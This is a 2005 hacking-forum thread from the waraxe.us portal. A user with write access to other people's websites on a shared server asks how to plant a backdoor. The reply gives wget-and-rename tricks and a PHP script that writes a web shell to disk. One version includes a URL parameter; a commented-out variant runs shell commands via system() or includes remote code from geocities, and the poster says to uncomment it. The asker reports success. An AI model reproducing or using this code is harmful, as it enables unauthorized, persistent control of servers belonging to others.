Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 609
Members: 0
Total: 609
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Remote file inclusion -> simple upload script
Post new topic  Reply to topic View previous topic :: View next topic 
simple upload script
PostPosted: Tue Jan 11, 2005 9:10 pm Reply with quote
Injector
Active user
Active user
 
Joined: Dec 29, 2004
Posts: 49




I got full access on the server but i still need help I dont really know much about shell coding. I can basically write to any page ther is on all the websites inside the server but what i want to do is to plant a backdoor. I tried planting Remview.php but everytime I use the "WGET" command to include something it doesnt copy the whole php code but instead it copies the page, even with the freewebhosts adverts on it Confused .

I have write access but my write access is abit dull. I do commands like "injector=cd www/adsdasdas/dasdsad/; echo here at home > somefile.html;ls -l"

What i do wanna do is to write something like a whole code or so not just a line of plain text. How do i do such? how do i do something like "<br>" or something like that?

If anyone has got some ideas please do tell me thanks

Can anyone give me some direction please. Thanks
View user's profile Send private message
PostPosted: Tue Jan 11, 2005 11:06 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




OK, if you wnat to upload files you can use WGET but remember to put your files in a web server where theres no PHP parser or insted change the extension to .txt use wget to upload it and then use mv to change the name and extension.

If you get access to server with remote file inclusion you can include a php script that creates a file and put what you what inside. I post a code here of a php script that creates a file
Code:

<?

$fd = fopen ("/var/www/html-up/tmp/inc_ceb9579d51fe3697cfa0d2b5fd5a5724_2.php", "w");

$codigo = '<? @include($_GET["a"]; ?>';
/*
$codigo = '<?';
$codigo .= "\n" . '$w = $_GET[w];';
$codigo .= "\n" . '$a = $_GET["a"];';
$codigo .= "\n" . 'if ($w == "a") { ';
$codigo .= "\n" . 'system($a);';
$codigo .= "\n" . '}';
$codigo .= "\n" . 'else if ($w == "b") {';
$codigo .= "\n" . 'include("http://www.geocities.com/" . $a);';
$codigo .= "\n" . '}';
$codigo .= "\n" . 'else {';
$codigo .= "\n" . 'include($a);';
$codigo .= "\n" . '}';
$codigo .= "\n" . '?>';
*/

//echo $codigo;

fwrite($fd, $codigo);
fclose ($fd);
?>


in /var/www/html-up/tmp/inc_ceb9579d51fe3697cfa0d2b5fd5a5724_2.php goes the script you want to create (filename)

hope this help!
View user's profile Send private message Visit poster's website
PostPosted: Tue Jan 11, 2005 11:11 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




remember to get out the comment tags.... the var $codigo is all commented.... /* */

Very HappyVery HappyVery Happy Laughing
View user's profile Send private message Visit poster's website
PostPosted: Wed Jan 12, 2005 6:26 am Reply with quote
Injector
Active user
Active user
 
Joined: Dec 29, 2004
Posts: 49




thanks Reflex. Everything's solved
View user's profile Send private message
PostPosted: Wed Jan 12, 2005 12:53 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




Wink Wink ok!! dont be a bad guy hahaha Razz Razz
View user's profile Send private message Visit poster's website
simple upload script
  www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.135 Seconds